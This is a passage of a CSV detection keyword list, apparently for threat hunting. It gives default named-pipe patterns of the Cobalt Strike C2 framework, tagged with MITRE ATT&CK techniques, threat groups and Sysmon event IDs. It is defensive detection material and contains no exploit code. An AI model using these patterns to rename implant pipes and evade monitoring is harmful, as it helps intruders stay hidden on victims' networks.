(sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\f53f*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - 
T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\fullduplex_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\interprocess_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\lsarpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\mojo_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\msagent_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\MsFteWds*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\msrpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - 
FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\MSSE-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\mypipe-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\netlogon_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - 
Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\ntsvcs*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\PGMessagePipe*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\postex_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 
- APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\postex_ssh_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\samr_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 
- T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\scerpc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - 
Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\SearchTextHarvester*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\spoolss_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 
T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\srvsvc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" +"\\status_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth 